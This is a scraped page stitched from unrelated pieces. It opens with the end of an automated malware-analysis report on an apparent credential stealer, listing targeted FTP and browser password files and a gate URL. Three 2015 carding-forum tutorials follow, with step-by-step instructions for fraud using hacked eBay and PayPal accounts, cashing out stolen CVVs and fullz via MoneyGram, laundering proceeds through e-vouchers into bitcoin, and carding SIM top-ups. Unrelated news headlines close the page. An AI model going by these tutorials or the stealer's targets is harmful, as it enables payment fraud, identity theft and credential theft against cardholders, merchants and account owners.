Anti Debug         TerminateProcess
Anti Debug         UnhandledExceptionFilter

Anti VM Trick discovered [2]
------------------------------------------------------------
Trick              Virtual Box
Trick              VMware trick

Suspicious API discovered [35]
------------------------------------------------------------
Function           CreateDirectoryA
Function           CreateFileA
Function           CreateFileMappingA
Function           CreateToolhelp32Snapshot
Function           DeleteFileA
Function           FindFirstFileA
Function           FindNextFileA
Function           GetCurrentProcess
Function           GetFileAttributesA
Function           GetFileSize
Function           GetModuleHandleA
Function           GetProcAddress
Function           GetTempPathA
Function           GetTickCount
Function           GetUserNameA
Function           GetVersionExA
Function           InternetCrackUrlA
Function           LoadLibraryA
Function           MapViewOfFile
Function           OpenProcess
Function           Process32First
Function           Process32Next
Function           RegCloseKey
Function           RegCreateKeyA
Function           RegEnumKeyExA
Function           RegOpenKeyA
Function           RegOpenKeyExA
Function           Sleep
Function           WSAStartup
Function           WriteFile
Function           closesocket
Function           connect
Function           recv
Function           send
Function           socket

Suspicious Sections discovered [2]
------------------------------------------------------------
Section            .data
Hash MD5           b896a2c4b2be73b89e96823c1ed68f9c
Hash SHA-1         523d58892f0375c77e5e1b6f462005ae06cdd0d8
Section            .rdata
Hash MD5           41795b402636cb13e2dbbbec031dbb1a
Hash SHA-1         b674141b34f843d54865a399edfca44c3757df59

File name discovered [43]
------------------------------------------------------------
Binary             wiseftpsrvs.bin
Data               ESTdb2.dat
Data               Favorites.dat
Data               History.dat
Data               bookmark.dat
Data               fireFTPsites.dat
Data               quick.dat
Data               site.dat
Data               sites.dat
Database           FTPList.db
Database           sites.db
Database           NovaFTP.db
Executable         unleap.exe
Executable         explorer.exe
FTP Config         FTPVoyager.ftp
Library            crypt32.dll
Library            kernel32.dll
Library            mozsqlite3.dll
Library            userenv.dll
Library            wand.dat
Library            wininet.dll
Library            wsock32.dll
Text               Connections.txt
Text               ftplist.txt
Text               signons.txt
Text               signons2.txt
Text               signons3.txt

Url discovered [2]
------------------------------------------------------------
Url                RhinoSoft.com
Url                http://0uk.net/zaaqw/gate.php

Meta data found [4]
------------------------------------------------------------
CompiledScript      AutoIt v3 Script
FileVersion         3, 3, 8, 1
FileDescription
Translation         0x0809 0x04b0









Basic Tutorial For Carding From Ebay

May 11, 2015, 10:30 am
$
0
0
BASIC TUTORIAL FOR CARDING FROM EBAY

REP ME AND RATE MY POST IF U LIKE IT... Smile

Section 1: Security.

1) We need to get an ebay with email access.
2) We use email access to get access to the paypal.
3) We then get some socks5, I use http://www.super-socks.com.
4) Always use same state socks5. If you can use same city. But not needed.
5) Check your socks5 on http://www.kingsocks.org to check for PP Blacklist.
6) Now log-in to your socks5, visit http://www.ip-score.com to verify no fraud detection.

Section 2: Securing the E-Mail.
1) Now we need to secure E-Mail Account.
2) Create an email only to receive email per account.
3) Log-in to eBay/PP Mail Access.
4) Use the email forward option. We enable the "do not store" option.
5) Now all email is routed to our set-up email.
6) Make sure to enable/disable as you need. E.G. Only redirect when you're AFK for a while.

Section 3: Using the PayPal/eBay Account.
1) Now we are all secure, it's time to use the eBay Account.
2) Log-in to the eBay account and find the item you want to card.
3) Card the item and checkout, remember to use your socks5.
4) Once checked out, immediately move item to the archive.
5) Now we message the seller, we say that our family member's birthday is in two days, can you ship direct to them. If they accept, go ahead, if not, ask to refund.
6) Check the Inbox to make sure no messages are linked to your product.
7) Now visit PayPal.com account, make sure to archive payments to avoid detection.
8) When you ask/receive questions for your item. Always move items to the default "My Folder 1"
9) We use "My Folder 1" as it's default. Trash folder on eBay can't be deleted, so we use this to keep under the radar.
10) Move your item in and out of the archive to check status (E.G. Check if shipped etc).

Cashout CVV To Money Easily - Private method

May 11, 2015, 12:17 pm
$
0
0
-Now all you need is a fresh good balance Hacked and strong CVV. and that is the most important part.
-Pick up a full detailed CVV , THE MOST IMPORTANT IS THE DOB AND SSN.
Next, run a detailed background search on the person you are using his SSN and DOB.
and YOU CAN DO IT By buying the background , search online.

Now you start the Transfer online,
Where is the trick?
if you have a good cvv, very good, u can use the card number, exp date, and the cvv code only,
Then u use the full detail of the other person you have the info on,
u can use info of diff person and card detail of diff person
now at the end of the transaction u will be asked secret question abt the person, that is where u use the details u buy from search "engines onlineBookmark"
use socks from winsocks,u can buy from inforegistry or intelegator and many other sites.

I used to cash out 200 to 300 from each card as a maximum to remove suspection and guarantee trans.


To clear it again well, i Edited everything today so there's nothing left missunderstood please Read carefully:

"-Get fullz
-Get a site u can register to check background of the person holding the fullz.
Now start the online transfer process.
"But the most important thing to know is that even if the card details on the fullz is dead, no worries. Just make sure the ssn+dob matches with the name on the fullz.
-Use the details on the fullz to fill up the details on the money gram website"

When u get to the payment side:

U can now fix in only the card details on a very good and valid cvv
Just the number, exp date and cvv2 code.
As i have mentioned you can use the original full details if the ccv is not DEAD!
- If dead ! Sure, Of a different card but remember the ssn and dob of original card!
Now money gram does not match the card details with the details used.
If they are not dead....best!
- At the last stage u will be asked security questions about the original card since u used it with the ssn and dob.
That is where u will need the website to check background.
-Moneygram will charge the card separate but will authorize payment if only u answer the security question right.

So for example: if u have the full details of ur brother in USA, u can use his details but use a different card to pay
When they ask the security question, u call him and he gives u the correct answer.
despite calling your brother for infos ,buy from Info registry ,Intelegator,
just google Background checker.


I like visa. Use a visa bin that you can create the authorization password urself
Cuz with visa, if the authorization password is correct it pays directly

U pay online To intelegator Or any website that checks background
U type the name of the original card holder And you search

Like when u check the cvv you bought before you use , sometimes the billing adress is not correct so i use the name to search."

Several Cashouts To BTC

May 11, 2015, 12:19 pm
$
0
0
*Introductory Methods*

Now that I mentioned buymebitcoin.co.uk, I have to add that they're completely retarded, and I joke not! I am still squeezing out BTC from them using Fake Utility scans (which can be easily found on the internet) confirming the address of the CC (which cannot be attached to PP) owner. That's all. They promise to have, and I quote, "Over 25BTC in stock, daily". To me, that's just inviting to a good fuck Big Grin.

************** I'm going to introduce an array of methods to cashout using either PayPal, CCs or both, some of which require you to do more work than others, but the payout will be beautiful. I won't even mention that your security needs to be tight to hide your ass every step of the way, so VPN & Socks5 needed.

**Method one**

Requirements
- PayPal account (Verified is better, these can be bought or created yourself)
- PayPal transfers from users such as GH0ST0WL (on Evo) OR CCs to send funds to yourself (this option is hotter, but viable)

There are a lot of sites which require PayPal payments for x amount of some eCurrency, i.e. egoPay, WebMoneyz or UKash, but it takes a while to process if you directly use a CC to buy it. However, what I found, is that using hacked funds in which a chargeback concurs after, say, a week, these eCurrencies can be bought flawlessly, all the while without alerting the site owners of fraudalent activities. There are a few ways to get these funds; either pay for a service which does so, or use PayPal's 'xclick/business' function to card some funds for a few hours, which, I believe, is enough time for those sites which claim 'Delivery within 3 hours'. The way this PayPal function works is as follows:

http://paypal.com/xclick/business=YOUREMAIL&amount=USDPRICE&item_name=0FAKEITEM

So, you specify your PayPal email address, your amount, and name a fake item in which the CC (which MUST NOT already be attached to a PayPal) owner is buying, and then you should have the funds, though, this sometimes fails to work depending on a varied number of factors. There are other ways to do this,
i.e. setting up a http://www.payhip.com account, listing a random PDF for sale, and paying yourself using CCs to your PayPal.
Once you have the moniez, you should be good to go. At this stage, I'd use my Google skills to look for sites which accept PayPal and offer to deliver near instantly. I guess the straight PayPal to BTC site is this: http://www.thebitcoinshop.info, but they require you to be verified for larger amounts.

However, sometimes sites like these do not always guarantee Bitcoins to your wallet. So, you're gonna have to be intuitive and look for other eCurrencies which can be bought using your hacked funds; either near instantly if the CC was used, or within a few days, if a hacked PayPal transfer was used. For the purposes of the method, I had chose to acquire UKash vouchers, as these can be cashed out to BTC and even to a Bank account, if you find the right exchange service.

So what is UKash? You have to do your homework on these eCurrencies to figure out the core mechanism on how they work. A quick Wikipedia skim tells me:

Ukash is an electronic money system regulated by the Financial Conduct Authority, that allows users to exchange their cash for a secure code. The code is then used to make payments online, to load cards or e-wallets or for money transfer. Codes are available from participating retail locations, kiosks, ATMs and online.Ukash users are given a unique 19-digit code representing their prepaid money; this is entered when making a transfer, payment or purchase online. (Wikipedia) To find sites who sell UKash vouchers via PayPal without running a tight ship, can be hard. These sites which offer this, however, can be found with a quick search on your favourite search engine; Google. Sites which offer credit/debit card payments through PayPal are GOLDEN, but you always have to assume that these sites have previously been victims of fraudalent activites, and so using hacked PayPals should suffice. When searching, I'd use keywords such as: PayPal, Ukash, Instant delivery and change the search filters so that it shows sites that are less than a month old. Here's what I obtained in about 20 minutes work:

http://xboxliveuk76.com
http://cardscodes.com
http://vougift.com
http://www.allcdkey.com
http://www.vouchersolutions.tk
http://zonalmarket.com/E-Wallet/account/login.php?redirect=http://zonalmarket.com/E-Wallet/pages/buy-ukashbtcpm.php
http://instantselling.biz
http://www.ukashkartal.com

All of these sites use PayPal as a means of paying for their (really fucking overpriced) UKash vouchers, and offer a near instant delivery (< 3 hours) . I would STRONGLY advise you to stay below £150 (3x£50 UKash) per PayPal account in order to receive the code(s). I've tried to directly use a CC to buy, but they'd always end up refunding me, for reasons unknown, and sometimes, they'd do the same for paying with PayPal (just a heads up). Since the chargeback only occurs after a few hours, you should, in theory, receive your code(s). Hereon, everything becomes so much easier, as any old site would accept UKash to exchange for BTC or other currencies. There's even a site which pays you straight to your bank for a relatively small fee. If you're at this point, scratching your head, I'm going to make it easy for you just this once:

http://www.bitcoin-services.co.uk/ukash-to-bitcoin.php <-- This site offers the best price for UKash vouchers as one £50 can get you about 0.17
BTC This also applies for other eCurrencies, such as PerfectMoney or egoPay USD, etc. So, again, I'm going to search for a site which sells Perfect Money vouchers and promises near instant deliver with PayPal as their payment processer; http://www.perfectevoucher.com is a site which offers this. They have a varied amount that you can buy, but that all depends on the funds that you have in your PayPal. Now, once I have the code for the voucher, I can proceed to sell it for BTC, and there are many exchange sites which offer this; again, here's one, pm2btc.me.

I want to further emphasise that eCurrency vouchers > BTC is the way to go these days, and would like to place a few inspiring sites for you to 'look' at:
- - - http://www.evoucher-world.com
- - - http://24hexchange.net/buy.html
- - - http://bestemoneys.com/e-currency-exchange_1.html
- - - http://www.mamooti.com
- - - http://www.interkassa.com/index.php
A golden forum: - http://www.dreamteammoney.com/index.php?showforum=24
- https://bitcointalk.org/index.php?board=53.0

So, all in all, using what you know in par with what you have can result in a great reward, and in this case, it's the reward of some sort of eCurrency, in which you can use to cashout to BTC. This is only touching the surface, however, and the rest is up to you.

**Method Two**

Requirements - Burner phone: this can be bought cheap online or, in the UK, bought from Tesco - SIM cards: has to be from a crappy provider (In the UK, Tesco Mobile/O2, or Lebara) - CCs to top up the SIM cards I, some time ago, noticed Blockchain's SMS deposit, and thought, "Can I card the shit out of this?" and so, I pursued to do so (Blockchain had removed this feature). I bought a burner phone for a method that I previously bought, and bulk O2 SIM cards off Craigslist, and, eventually, SMS to Bitcoin or any other cashout method then seemed viable. So you have a burner phone, you have a SIM, and you have a CC, what can you do with it? Well the obvious thing is to call up the automated service and top up the phone using your CC information. Try to buy CCs from the country in which the SIM was issued, i.e. UK SIMS => UK CCs. Always aim for the Maximum amount the SIM can be topped up, but be considerate, as over 3 or so fraudalent top ups can cause the SIM to be eventually blocked. You can always buy top up vouchers from http://phonepal.co.uk using CCs which are not attached to a PayPal card, but I'd buy only one.

Now, you should have a topped up SIM, you can go ahead and buy BTC from Blockchain or http://bitcoins-instant.info, and specify your wallet address, et voila, you should have a slow, but stable way to get BTC. This is only one way to make use of this, I'd imagine you to be a bit more creative Big Grin

If you can card 250 EUROS onto a SIM, try ahead and use http://www.ukashkartal.com Mobile Payment

**A Notice**

The fundamental teaching I want you to take away from here is pretty much to be innovative; there is money to make in everything; this is just an insight to the whole carding scene. I mean, I could tell you to create a domain (http://www.domains4bitcoins.com), create several fake pages, have several fake policies all advertising on how you would offer the best price for BTC via a SMS payment, and then advertise it on Exchange forums, but I won't dwell into that now Tongue. Anyways, I think my work here is done. Hopefully, this will be the last guide you purchase, because you've wisened up.

Good luck, and stay safe. Nothing is true. Everything is permitted.
Viewing all 421 articles
Browse latest View live
More Pages to Explore .....
Search

Latest Images

Eco Data 4/26/24

Eco Data 4/26/24

April 25, 2024, 5:00 pm
‘Pay day every day’ may become Shangri-La Group, BPOs’ secret to happy employees

‘Pay day every day’ may become Shangri-La Group, BPOs’ secret to happy employees

April 25, 2024, 5:51 am
Nonprofit donates custom home in this East Bay city for Marine injured in...

Nonprofit donates custom home in this East Bay city for Marine injured in...

April 23, 2024, 7:00 am
New private rooms on Tokaido Shinkansen change the way we travel from Tokyo...

New private rooms on Tokaido Shinkansen change the way we travel from Tokyo...

April 22, 2024, 6:00 am
Ukraine bans military from online gambling amid addiction concerns

Ukraine bans military from online gambling amid addiction concerns

April 22, 2024, 5:17 am
ಮಂಡ್ಯದಿಂದ ಸುಮಲತಾ ದೂರ; ಹೆಚ್‌ಡಿಕೆ ಪರ ಪ್ರಚಾರಕ್ಕಿಳಿಯದ ಸಂಸದೆ –ಬರ್ತಾರೆ ನೋಡೋಣ ಎಂದ...

ಮಂಡ್ಯದಿಂದ ಸುಮಲತಾ ದೂರ; ಹೆಚ್‌ಡಿಕೆ ಪರ ಪ್ರಚಾರಕ್ಕಿಳಿಯದ ಸಂಸದೆ –ಬರ್ತಾರೆ ನೋಡೋಣ ಎಂದ...

April 20, 2024, 8:08 pm
OCBC Bank Singapore Offers Up to 2.8% p.a. Fixed Deposit Promotion from 21...

OCBC Bank Singapore Offers Up to 2.8% p.a. Fixed Deposit Promotion from 21...

April 20, 2024, 12:38 pm
National Poetry Month 2024: Maxine Starr

National Poetry Month 2024: Maxine Starr

April 19, 2024, 9:56 am
Vegan Chicken Pot Pie

Vegan Chicken Pot Pie

April 19, 2024, 9:18 am
Firefox UX: On Purpose: Collectively Defining Our Team’s Mission Statement

Firefox UX: On Purpose: Collectively Defining Our Team’s Mission Statement

April 19, 2024, 7:03 am